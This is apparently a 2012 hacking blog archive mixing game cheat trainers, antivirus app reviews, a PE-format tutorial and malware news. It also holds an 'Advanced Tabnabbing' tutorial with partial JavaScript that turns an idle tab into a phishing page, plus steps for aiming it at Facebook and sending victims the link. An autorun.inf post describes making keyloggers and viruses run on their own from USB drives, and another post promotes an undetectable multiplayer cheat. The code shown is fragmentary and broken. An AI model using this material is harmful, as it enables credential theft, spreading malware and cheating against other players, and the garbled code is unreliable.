New Post


Monday, April 30, 2012
Angry Birds Space Game Hack v2 Trainer

Angry Birds Space Game Hack v2 Trainer

Angry birds is one of the most famous game of year 2011 and 2012. Let's add new flavor to your game.. If you are stuck at some point and unable to unlock further levels then its best trainer for you. This Angry birds trainer was actually made for Angry birds Space but it works on almost all versions of Angry birds. I have tested Angry birds hack will v1.0 of all angry birds versions angry birds rio, rovio space etc. and it works perfect.

hack angry birds, unlock angry birds
Angry birds Hack or trainer v2+

The trainer( or hack) contains two basic functions:
1. Control the bird.
2. Control bird after the explosion.

But there is one drawback both options cannot be used at same time, either of one is activated at one time.
If you want to change the cheat, you need to disable the one and activate the other.

How to use the Angry birds trainer or hack?
1. Download the Angry birds trainer:

2. Extract the trainer and run the trainer.
3. Now you can open the game using start game button in trainer or by starting the game with its own icon.
4. Hit the number keys on keyboard to turn on / off the trainer.
5. You can also use the check box to enable or disable the hack.

How to control bird?
First activate the cheat, then when in game you launch the bird towards bricks and walls, just use the below arrow keys to control the bird.
U: Up
J: Down
H: Left
K: Right

When You use this cheat, if an explosion happens, You will usually be able to control another object like rocks etc. This is useful if Your bird has exploded but You can still control an object to smash things.

How to Control Bird even after explosion?
This is basically the same option as the first one, with a "safety lock". 
Use it this way:
Hold down the Space button.
Launch the bird.
Release the space button.
Control the bird in the same way as in the first cheat.

If an explosion happens, You will still be able to control the bird unlike in the first option.
However if Your bird has exploded (like those exploding birds), You loose the benefits of controlling another object instead.

If anyone wants its cheat tables source code and he is heartily welcome.

I hope you will enjoy this hack or trainer. Report us if you find any bugs or recommend any improvements.
Credit of developing this hack goes to Geri.
Thursday, April 19, 2012
Top 7 Android Security Apps by HackingLoops

Top 7 Android Security Apps by HackingLoops

If you are a active internet/web user, you must be knowing the potential dangers that lurk online which includes harmful malwares, viruses, Trojans and spyware bots etc. These threats exposes your private/personal data to hackers (unwanted users) and put your privacy at risk. So to avoid any such risks its necessary to use good security apps that can protect yourself from all the above mentioned threats and potential dangers.

These security apps allow users to protect themselves from not only online harmful threats (malware, spyware, etc) but also from physical ones such as in the case of the phone being misplaced or stolen. So HackingLoops brings top Android security apps list for android phones.
best security app for android phones
Top 7 Android Security Apps Ever by Hackingloops

1. Lookout Security & Anti-Virus

Lookout Security & Anti-virus app for Android is an application that secures Android users from threats such as bugs, Trojans and viruses that may enter the device through local networks or online. Lookout Security & Anti-virus allows users to protect their vital data and find their phone if they misplace it, and backup their important files and documents in a safer place.

Use the Lookout Security & Anti-virus app to scan every individual app you download to make sure the apps are safe from malware, spyware and Trojans. A great feature found in the application is the “Routine Check” feature that allows users to schedule daily or weekly scans of the apps you download. You can also get automatic, over-the-air protection against the latest threats.

2. AVG Antivirus

AVG Antivirus is the Android based application of the much renowned antivirus software for personal computers with the same name. AVG Antivirus app allow users to scan apps, setting files and media card in real-time allowing you to find any threats such as malware, Trojans and spyware in any of them that may put your privacy and vital information at risk of being exposed. Not only applications, but also the AVG Antivirus application for Android allows users to screen incoming SMS to detect any harmful threats.

The AVG Antivirus also ensures maximum speed of your phone by giving users a task manager to kill off any apps and tasks that slow the device down.

3. McAfee WaveSecure

McAfee WaveSecure is an award winning mobile protection app for your Android devices and systems. McAfee WaveSecure gives users the option to secure their personal data on mobile device, in the event that the mobile may be lost or stolen. In such a case, McAfee WaveSecure can be used to track your device and even wipe all data on the Android device saving it from any prying eyes. An easy to use web portal allows users to backup and restore their personal data.

4. Norton Antivirus & Security

Norton Antivirus & Security is a security application for Android devices with iOS 2.1 and up. The Norton Antivirus & Security allows users to protect their devices from loss of data, in case of theft and malware attacks. One of the best antivirus companies in the world, Norton Antivirus, backs Norton Antivirus & Security. Norton Antivirus & Security provides all the features that will be required by an Android user to keep themselves save and secure from malware, Trojans, spyware and other incidents such as theft. The antivirus protection automatically scans the downloaded apps and app updates against any potential harmful threats. It also searches for and removes mobile security threats that may tamper with your phone in order to achieve your personal information. Norton Antivirus & Security allows users to scan the SD card for any harmful threats if any. Norton Antivirus & Security also allows users to lock their devices and remote wipe any confidential data found on the device if their devices are misplaced or stolen.

5. Mobile Security & Antivirus

The Mobile Security & Antivirus provides the users with two basic functions that keep vital information safe and secure from all kinds of threats. These two functions are that of – Antivirus protection and security. The Mobile Security & Antivirus protects your Android device free from viruses and saves your battery life, an essentially helpful feature where you require battery life and have only a little left. Use the Mobile Security & Antivirus’s malware scanner feature to scan apps as you download them to scan for any harmful threats that may put your privacy at risk, including your confidential data such as passwords, e-mails, etc.

One of the best features present in Mobile Security & Antivirus is the “Application Audit” feature that can be used to ensure that apps do not take more permission then they should and thus allow you to safeguard your private data, and even access to unwanted Internet updates or so.

6. Avast! Mobile Security

Avast! Mobile Security provides Android users with OS 2.1 and up with protection from viruses and theft security issues. Use the Avast! Mobile Security to protect private data with automatic virus scans and find infected URLs before they infect your mobile with malware and spyware. Use the SMS commands to wipe, lock and GPS track your Android device in case if it is stolen or misplaced somewhere outside home. You can also use the “Activate Siren” feature to turn on a loud siren allowing you to locate your mobile phone – a helpful feature if phone is misplaced somewhere inside home.

Avast! Mobile Security application also allows users to screen incoming SMS and phone calls. Use parameters to direct specific unwanted calls to voicemail.

7. NQ Mobile Security & Antivirus

The NQ Mobile Security & Antivirus is a total mobile security solution for Android devices, protecting them from harmful threats such as malware, spyware and Trojans while also allowing users to monitor their devices to ensure maximum speeds. Use the NQ Mobile Security & Antivirus app to browse the Internet safely without having to worry about phishing, fraud sites and malware that lurks the Internet. The app is updated regularly keeping in track with all the latest viruses and threats discovered.

Use the Network Manager to track your traffic consumption over a period of 30 days and keep a track on the trend and statistics as well. Use the Backup & Restore feature present in the NQ Mobile Security & Antivirus app to backup and retrieve contacts and messages found on any of your mobile device – iOS, Android, Blackberry or Nokia.

That's all the list of top 7 antivirus and security apps for android platform. I hope, i didn't missed any of the good app for security. Let me know if i missed one..Keep connected!
Saturday, April 14, 2012
Advanced Tabnabbing Tutorial HackingLoops

Advanced Tabnabbing Tutorial HackingLoops

Hey friends, today i am going to How to Hack emails, social networking websites and other websites involving login information. The technique that i am going to teach you today is Advanced Tabnabbing. I have already explained what is basic tabnabbing today we will extend our knowledge base, i will explain things with practical example. So lets learn..
Advanced Tabnabbing, Hack Facebook, Gmail, Yahoo , Hotmail etc
Advanced Tabnabbing Tutorial
I will explain this tutorial  using attack scenario and live example and how to protect yourself from such stuff.
Let consider a attack scenario:
1. A hacker say(me Lokesh) customizes current webpage by editing/adding some new parameters and variables.( check the code below for details)
2. I (Lokesh) sends a copy of this web page to victim whose account or whatever i want to hack.
3. Now when user opens that link, a webpage similar to this one will open in iframe containing the real page with the help of java script.
4. The user will be able to browse the website like the original one, like forward backward and can navigate through pages.
5. Now if victim left the new webpage open for certain period of time, the tab or website will change to Phish Page or simply called fake page which will look absolutely similarly to original one.
6. Now when user enter his/her credentials (username/password), he is entering that in Fake page and got trapped in our net that i have laid down to hack him.
Here end's the attack scenario for advanced tabnabbing.

Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do.  Hacking email accounts is criminal activity and is punishable under cyber crime and you may get upto 10 years of imprisonment, if got caught in doing so.

Before coding Part lets first share tips to protect yourself from this kind of attack because its completely undetectable and you will never be able to know that your account is got hacked or got compromised. So first learn how to protect our-self from Advanced Tabnabbing.

Follow below measure to protect yourself from Tabnabbing:
1. Always use anti-java script plugin's in your web browser that stops execution of malicious javascripts. For example: Noscript for Firefox etc.
2. If you notice any suspicious things happening, then first of all verify the URL in the address bar.
3. If you receive any link in the Email or chat message, never directly click on it. Always prefer to type it manually in address bar to open it, this may cost you some manual work or time but it will protect you from hidden malicious URL's.
4. Best way is to use any good web security toolbar like AVG web toolbar or Norton web security toolbar to protect yourself from such attacks.
5. If you use ideveloper or Firebug, then verify the headers by yourself if you find something suspicious.

That ends our security Part. Here ends my ethical hacker duty to notify all users about the attack. Now lets start the real stuff..

Note: Aza Raskin was the first person to propose the technique of tabnabbing and still we follow the same concept. I will just extend his concept to next level.

First sample code for doing tabnabbing with the help of iframes:
Title: Advanced Tabnabbing using IFRAMES and Java script
Author: De$trUcTiVe M!ND (

<style type="text/css">
html {overflow: auto;}
html, body, div, iframe {margin: 0px; padding: 0px; height: 100%; border: none;}
iframe {display: block; width: 100%; border: none; overflow-y: auto; overflow-x: hidden;}

<script type="text/javascript">
//----------Set Script Options--------------
var REAL_PAGE_URL = ""; //This is the "Real" page that is shown when the user first views this page
var REAL_PAGE_TITLE = "Google"; //This sets the title of the "Real Page"
var FAKE_PAGE_URL = ""; //Set this to the url of the fake page
var FAKE_PAGE_TITLE = "HackingLoops| Next Generation Hackers Portal"; //This sets the title of the fake page
var REAL_FAVICON = ""; //This sets the favicon.  It will not switch or clear the "Real" favicon in IE.
var FAKE_FAVICON = ""; //Set's the fake favicon.
var TIME_TO_SWITCH_IE = "4000"; //Time before switch in Internet Explorer (after tab changes to fake tab).
var TIME_TO_SWITCH_OTHERS = "10000"; //Wait this long before switching .
//---------------End Options-----------------
var TIMER = null;
var SWITCHED = "false";

//Find Browser Type
var BROWSER_TYPE = "";
if(/MSIE (\d\.\d+);/.test(navigator.userAgent)){
 BROWSER_TYPE = "Internet Explorer";

 var link = document.createElement('link');
 link.type = 'image/x-icon';
 link.rel = 'shortcut icon';
 link.href = REAL_FAVICON;

//Create our iframe (tabnab)
var el_tabnab = document.createElement("iframe");"tabnab";"tabnab";
el_tabnab.setAttribute('src', REAL_PAGE_URL);

//Focus on the iframe (just in case the user doesn't click on it)

//Wait to nab the tab!
if(BROWSER_TYPE=="Internet Explorer"){ //To unblur the tab changes in Internet Web browser
 el_tabnab.onblur = function(){
 TIMER = setTimeout(TabNabIt, TIME_TO_SWITCH_IE);
 el_tabnab.onfocus= function(){
 if(TIMER) clearTimeout(TIMER);
} else {
 setTimeout(TabNabIt, TIME_TO_SWITCH_OTHERS);

function TabNabIt(){
 if(SWITCHED == "false"){
 //Redirect the iframe to FAKE_PAGE_URL
 //Change title to FAKE_PAGE_TITLE and favicon to FAKE_PAGE_FAVICON
 if(FAKE_PAGE_TITLE) document.title = FAKE_PAGE_TITLE;

 //Change the favicon -- This doesn't seem to work in IE
 if(BROWSER_TYPE != "Internet Explorer"){
 var links = document.getElementsByTagName("head")[0].getElementsByTagName("link");
 for (var i=0; i<links.length; i++) {
 var looplink = links[i];
 if (looplink.type=="image/x-icon" && looplink.rel=="shortcut icon") {
 var link = document.createElement("link");
 link.type = "image/x-icon";
 link.rel = "shortcut icon";
 link.href = FAKE_FAVICON;


Now what you need to replace in this code to make it working say for Facebook:
2. REAL_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More
3. FAKE_PAGE_URL : Your Fake Page or Phish Page URL
4. FAKE_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More
6. FAKE_FAVICON : Your Fake Page URL/favicon.ico ( Note: Its better to upload the facebook favicon, it will make it more undetectable)
7. BROWSER_TYPE : Find which web browser normally user uses and put that name here in quotes.
8. TIME_TO_SWITCH_IE : Put numeric value (time) after you want tab to switch.
9. TIME_TO_SWITCH_OTHERS : Time after which you want to switch back to original 'real' page or some other Page.

Now as i have explained earlier you can use this technique to hack anything like email accounts, Facebook or any other social networking website. What you need to do is that just edit the above mentioned 9 fields and save it as anyname.htm and upload it any free web hosting website along with favicon file and send the link to user in form of email or chat message ( hidden using href keyword in html or spoofed using some other technique).

That's all for today. I hope you all enjoyed some advanced stuff. If you have any doubts or queries ask me in form of comments.
A comment of appreciation will do the work..

Friday, April 13, 2012
How to Create autorun file for pendrives or usb drives

How to Create autorun file for pendrives or usb drives

Hey Friends, today i am going to teach you "How to create a Autorun.inf file for USB drives or simply CD drives" so that it can execute programs. Programs can be viruses, keyloggers, rats or simply normal services that you want to execute automatically whenever user open his/her pendrive or USB drive. Its the easiest way to spread your programs to schedule, so that they can execute by itself without any user interaction.
Creating a simple or complex autorun file for your pendrive or USB drive.

Note: You can also follow these instructions when making a CD. You just have to burn it on the cd.

create autorun file for Usb drives or pendrives
Creating Autorun.inf file for executing keyloggers or viruses

When you plug a  USB or pen drive in, you might be interested in making a program, or other things happen as soon as you plug in. The way you accomplish this is through the Autorun.inf file. The autorun.inf file is located in the root of the usb drive and tells Windows what to do automatically.

This autorun can be used for good things and also for bad things depending on what you like. I am Destructive Mind, so i use it to run my coded viruses and keyloggers to execute automatically by themselves as soon as user open folder or simply opens pen drive or usb drive.

This tutorial covers:
  • Creating a USB Autorun.inf
  • Changing label\icon of thumbdrive
  • Making a new option appear in the autorun menu
  • Making programs automatically run when plugged in
So Read On How to create Autorun.inf file...
Creating a USB Autorun.inf :

To create an autorun file, open Notepad and save ‘autorun.inf’’ (with quotes) and save it to the root of the drive. All it needs to have is in the first line;


Changing label\icon of thumbdrive:

Follow the steps in Creating a USB Autorun.inf. Before you save it, type this in in this order!




And save. Make sure the icon file is in the root of your drive.

Making a new option appear in the autorun menu:

Right, so make your autorun file and type this into Notepad:





Open Program

Save it and exit. Once again, the program has to be in the root. Now, when you plug it in, the option should appear in the menu.

Making programs automatically run when the USB is plugged in:

Follow the same instructions, blah blah blah;





And that’s it for this tutorial! Your Autorun program is ready to execute whatever you want. Here i have written to execute a simple program called programname.exe

If you have any questions or queries, ask in form of comments. If you like my articles just a comment of appreciation will do the thing.

Thanks for reading! 
Wednesday, April 11, 2012
Reverse Engineering Tutorial 3 | EXE File Structure

Reverse Engineering Tutorial 3 | EXE File Structure

Hey friends, today i will teach you the internal structure of a executable or simply called exe file. This article is very important because it will clear your concepts of different sections of executable file and in which section you will find useful stuff during reverse engineering of any application or simply debugging any application. From high level view exe file only looks like a single file but actually it consists of several parts and a hacker must understand what are these parts and what is the use of all these different sections in exe file.

reverse code engineering, rce, exe reverse engineering
Exe Internal Sections

Whenever we debug any exe file, you might have noticed several strange looking things appears and most of times it happens you don't able to understand what are these, so what you do, you close the debugger. But this will not happen after reading this article. Once you start exploring things that you understand, you will explore more and hence chances of success will be more. So friends lets start learning Exe file structure.

The sections that are most commonly present in an executable (depends on the compiler used or debugger used to analyze the executable) are:  
  •  Executable Code Section, named .text (Microsoft) or .txt (olydbg) or CODE (Borland)  
  •  Data Sections, named .data, .rdata, or .bss (Microsoft) or DATA (Borland)  
  •  Resources Section, named .rsrc  
  •  Export Data Section, named .edata  
  •  Import Data Section, named .idata  
  •  Debug Information Section, named .debug  
Note: Structure of a PE(portable executable) file on disk is exactly the same as when it is loaded into memory so if you can locate info in the file on disk you will be able to find it when the file is loaded into memory.  
However it is not copied exactly into memory. The windows loader decides
which parts need mapping-in and which parts has to be omitted. Data that is not mapped-in is placed at the end of the file past any parts that will be mapped-in e.g. Debug information.  
Lets understand the detailed meaning of all sections:
1. Executable Code Section
In Windows, all code segments  reside in a single section called  .text or .txt or CODE. Since Windows uses a page-based  virtual memory management system, having one large code section is easier to manage for both the operating system and the application developer. This section also contains the entry point(EP) and the jump thunk table (where present) which points to the IAT.
a. EP is the entry point from where the code section starts in obfuscated exe file.
b. Jump thunk table : contains all the jump addresses and references.
c. IAT: It stands for import address table, this is a table of function pointers filled in by the windows loader as the dlls are loaded. I will post a complete tutorial for Import address table because its a very important concept. For now just take it as table containing function pointers.

2. Data Section
The  .bss section represents uninitialized data for the application, including all variables declared as static within a function or source module.
The  .rdata section represents read-only data,  such as literal strings, constants, and debug directory information.
All other variables (except automatic variables, which appear on the stack) are stored in the .data section. These are application or module global variables.

3. Resource Section
The  .rsrc section contains resource information for a module. There are many
resource editors available today which allows editing, adding, deleting, replacing and copying resources. 

4. Export Data Section
The  .edata section contains the Export Directory for an application or DLL.
When present, this section contains information about the names and addresses of exported functions.

5. Import Data Section
The  .idata section contains various information about imported functions
including the Import Directory and Import Address Table. The import section contains information about all the functions imported  by the executable from DLLs. This information is stored in several data structures. The most important of these are the Import Directory and the Import Address
Table which we will discuss next. The Windows loader is responsible for loading all of the DLLs that the application uses and mapping them into the process address space. It has to find the addresses of all the imported functions in their various DLLs and make them available for the executable being loaded.

6. Debug Information Section
Debug information is initially placed in the  .debug section. The PE file format
also supports separate debug files (normally identified with a .DBG extension) as a means of collecting debug information in a central location. The debug section contains the debug information, but the  debug directories live in the .rdata section mentioned earlier. Each of those directories references debug information in the .debug section.   

7. Base Relocation Section 
Last but not the least and most important section too for hackers perspective. When the linker creates an EXE file, it makes an assumption about where the
file will be mapped into memory. Based on  this, the linker puts the real addresses of code and data items into the executable file. If for whatever reason the executable ends up being loaded somewhere else in the virtual address space, the addresses the linker plugged into the image are wrong. The information stored in the  .reloc section allows the PE loader to fix these addresses in the loaded image so that they're correct again. On the other hand, if the loader was able to load the file at the base address assumed by the linker, the .reloc section data isn't needed and is ignored. 

We will continue our reverse code engineering tutorials in Future classes too. So keep connected and keep reading our articles.
If you have any doubts ask me in form of comments.
Tuesday, April 10, 2012
Android attacked by Malware hidden in Game

Android attacked by Malware hidden in Game

Its very rare in internet world to listen about such news that Android Malware detected but recently a chinese hacker again tries to hack android, and this time, he used a game named "The Roar of the Pharaoh". The bug was spotted by the security team(penetration testing) from Sophos, well known security firm. The game does not show any security or permission issues while user installs it, so Android user believes that it is a reliable and non-malicious software and will not harm the system. So friends please avoid android games and applications from unknown publishers as it may result into critical information leak and sometimes into OS crash.

android Malware
New Android Malware Detected by Sophos

But, actually what the game does is that it collects all the sensitive and personal information from the device(like the normal Trojans does) and sends it to the author via an SMS with premium rates, without taking the user's permission(means in the background). The Trojan sends information like the phonebook entries, SMSs, IMEI number, phone number, OS version etc. Though no cases illegal usage of the users information have been reported yet but researchers believe that more damage can be done using this bug.

According to the vendor, the malware runs as a service called "GameUpdaterService", which sounds like a legitimate name for an application and user thinks that some game is updating, but its just another indication of the social engineering element of the campaign which makes it look like reliable application, next to the actual brand-jacking of a legitimate game’s name.

The application has been detected as an Stinter-A, the mobile phone companies process the money to the authors before the application user gets the bills.Michael Sutton, vice president of security research at cloud-based security provider Zscaler, said "the fake "The Roar of the Pharaoh" app for Android reflects the shift of malware authors to target the Android platform, whether smartphones or tablets. Fake game apps that are really Trojans are increasing and "this is a typical scam for Android now," he added.

The interests of the hackers has now shifted towards the Android phones from computers. The android officials have not spoken anything much about this application, but have warned its users to beware of such malicious applications.

The authors have not been caught yet, and the Chinese Security is still working to put them behind the bars.

Wednesday, April 4, 2012
Norton Antivirus 2012 Full for 2 Months

Norton Antivirus 2012 Full for 2 Months

Norton Antivirus 2012 now available with a 60 day promotional offer to test it for free. The installation of Norton Antivirus 2012 is very simple and fast. This time users don’t have to restart their computer after installation. Norton claims the antivirus will be quick in detecting and elimination of viruses and spyware before they reach your computer.

download norton 360 full, norton antivirus full download for 60 days
Get Norton Antivirus for free

Norton Antivirus 2012 provides 3 levels of protection.
Based on Virus Definitions, SONAR Protection (Symantec Online Network for Advanced Response) which is basically a heuristics detections and Norton Insight Network Protection. Norton AntiVirus and Internet Security 2012 are the best security software you can get, and it again wins Gold 5 Star Editors Choice Award.

Norton Internet Security 2012 Features:
  • Stop viruses, spyware, and online identity theft with the industry's most powerful virus protection
  • Browse, shop, bank, and socialize online without worry
  • Enjoy your favourite online activities safely, without annoying slowdowns or disruptions
Norton 360 Version 5.0 Features:
  • Offers all-in-one protection to surf, shop and bank online safely
  • Keeps your computer running its best with PC tune-up tools
  • Backs up your photos, music and other files
  • Includes 2 GB of online storage
  • Helps keep your kids safe online
How to get Norton Antivirus 2012 for 60 days?
We can get 60 day free license for Norton 360 Version 5.0 and Norton Antivirus 2012 Full.   
Visit the following Promotional page:

I hope you all going to enjoy the share. Also i forgot to tell you one more thing you can renew your trial two more times 1 month each that means you can use this for 120 days in total. So keep yourself secured and beat the hackers by next level security.
AOE Conquerors 1.0c Game ranger Hack v6

AOE Conquerors 1.0c Game ranger Hack v6

Hey friends, I am back with new version of Destructive Mind v6 AOE 1.0c conquerors Multiplayer hack which successfully works on Game Ranger, i have fixed almost all the bugs that people has told me in the previous version and now it will work perfectly (as previous version hangs and displays error messages) , It consists of all the previous combo packs of Age of Empires including combo pack 1, combo pack 2, combo pack 3 features(fixed). I have improved lots of cheats in this Age of empire hacks and make it further undetectable during the game. It works 100% on Game ranger . This trainer is awesome...just enjoy game hacks and have an extra edge over experts.
AOE hack, Age of Empire Hack, game ranger hacks
Age of Empire Conquerors Hack by Destructive Mind
What's new in this version?
1. Update Check is Fixed.
2. Hanging of Application and crashing of Game is fixed.
3. Warning and Error messages has been fixed.
4. All cheats related bugs has been fixed.
5. Activated only for specific player after pressing Q+(key). (please read the Note part: If you don't select the player then it will be activated for P1 by default so always choose key before start).
6. Kills and razes tributes are fixed, only tributes for resources 1000 and 500 resources remains. 
7. Steal resources hacks are fixed, can be used using stale command in hack menu.
8. Combo pack 3 and v5 bugs are fixed.
Note: You need to close the hack after each match and then restart again for new game. Else it will be automatically activated for the player which was your color in previous game.

How to use the Hack on AGE OF EMPIRES II Conquerors in Game Ranger:
1. Start the Game ranger. Now Join any AOE II conquerors room.
2. While you are in room Go to the hack folder and start the Hack (Destructive Mind v6) by double clicking on it.
3. Now when the Game starts (means when you in Game and selecting civilizations teams etc). Go back to Hack and click on Enable Hacks and return to game.
4. After game starts, the first thing to do is to select your player number. If you’re green for example, you’re player 3 (if you didn’t change color yourself). So press `(key above the TAB button) to bring up the chat dialog and press and hold Q while pressing 3, after which press `(key above the TAB button) again to activate the hack. Don’t press ENTER – you’d only be letting others know you’re doing something stupid and the hack command won’t work anyway.

Note:  Blah.txt contains all the hacking commands that you will enter into cheat box.
Readme.txt contains the quick Guide to use the cheat commands during the game.

Don't delete any file in the package otherwise some part and features of hack will not work properly.

I hope you all like it.... Enjoy and have fun... If you like it please comment. Give me new suggestions for improvement and i will think and build them.
Designed by Hackingloops.